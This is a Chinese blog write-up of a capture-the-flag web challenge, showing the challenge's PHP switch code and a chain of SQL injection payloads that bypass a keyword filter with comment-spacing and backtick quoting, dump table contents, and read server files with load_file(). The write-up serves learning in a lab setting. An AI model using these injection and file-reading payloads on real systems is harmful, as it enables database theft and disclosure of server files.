ShowCtf Web14 --不会编程的崽

不会编程的崽2026-03-28 11:06

时隔一年多,终于再次有机会更新了。24年忙着HVV,在北京HVV结束后呢,回学校忙着找工作,几乎停止了学习,UP运气很好,在这个世道获得了一缕安稳。趁着这次培训抽出时间继续更新。UP很菜,有什么不对的地方,还请指正。

这个题,UP也是被耍的团团转。

php 复制代码 
<?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__);

找没有break的分支,自然就是3了,访问?c=3即可,得here_1s_your_f1ag.php,继续访问

有一个弹窗,一个查询,多半是sql注入了。查看源代码,发现过滤函数

php 复制代码 
if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){
		die('@A@');
	}

过滤了information_schema.tables。UP第一时间想到了无列明注入,尝试换表,测试无列明盲注,毛都没有,非常头痛。稍微稍微稍微看了其他UP的文章。

php 复制代码 
information_schema.`tables`

写成这样就好了。无语几秒,把这茬整忘了。然后就是按规矩来,明显没有引号闭合,而且是回显注入。上payload。

php 复制代码 
-1/**/union/**/select/**/1      //爆出1
-1/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.`tables`/**/where/**/table_schema=database()    //爆出表名content
-1/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.`columns`/**/where/**/table_name='content'   //爆出列名id,username,password
-1/**/union/**/select/**/group_concat(password)/**/from/**/content   //爆出提示flag is not here!,wow,you can really dance,tell you a secret,secret has a secret...

注入了半天,结果不在这,看提示应该在首页提醒的secret.php里。原来是考回显注入读文件。

php 复制代码 
-1/**/union/**/select/**/load_file('/var/www/html/secret.php')
//得到提示
<script>alert('<!-- ReadMe -->
<?php
$url = 'here_1s_your_f1ag.php';
$file = '/tmp/gtf1y';
if(trim(@file_get_contents($file)) === 'ctf.show'){
	echo file_get_contents('/real_flag_is_here');
}')</script>

别管这个代码了,都说了在这/real_flag_is_here,继续读。这个题很有趣,值得记录。

php 复制代码 
-1/**/union/**/select/**/load_file('/real_flag_is_here')
相关推荐
这个DBA有点耶2 小时前
时序数据库深度对比:2026 年主流 TSDB 架构演进与选型指南
数据库·sql·云原生·架构·运维开发·时序数据库
计算机安禾2 小时前
【数据库系统原理】第9篇:SQL的结构化思维:DDL、DML与DCL的职责分离
数据库·sql·oracle
计算机安禾2 小时前
【数据库系统原理】第12篇:视图机制:外模式在SQL层级的逻辑数据独立性实现
数据库·sql·oracle
前进的李工2 小时前
MySQL性能优化:索引与子查询实战技巧
数据库·sql·mysql·性能优化
迷枫7123 小时前
达梦 SQL 执行计划操作符与 TRACE、ET 学习笔记
笔记·sql
念越3 小时前
SQL 基础语法复习
数据库·sql·数据库系统概论
华山令狐虫3 小时前
告别手写 SQL——DBAPI 企业版 v4.6.0 推出 AI 助手
数据库·人工智能·sql·dbapi
计算机安禾4 小时前
【数据库系统原理】第10篇:SQL高级查询机制:嵌套子查询与相关子查询的执行窥探
大数据·数据库·sql
一条泥憨鱼5 小时前
苍穹外卖【day3|菜品管理】
java·数据库·sql·mysql·mybatis
TDengine (老段)5 小时前
TDengine SQL 解析与词法分析 — 从字符串到 AST 的转换之路
大数据·数据库·sql·物联网·时序数据库·tdengine·涛思数据
热门推荐
01【AI】2026 年具身智能模型和世界模型总结022026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf03GitHub 镜像站点04Codex 下载安装指南:Windows 和 macOS 官方版下载052026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?06Agnes AI 全模态 API 免费实测报告:文生图 + 文生视频完整测试07【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法08CC-Switch & Claude 基于 Linux 服务器安装使用指南09AI科技热点日报 | 2026年6月1日10CC-Switch 下载、安装与使用配置指南【2026.5.29】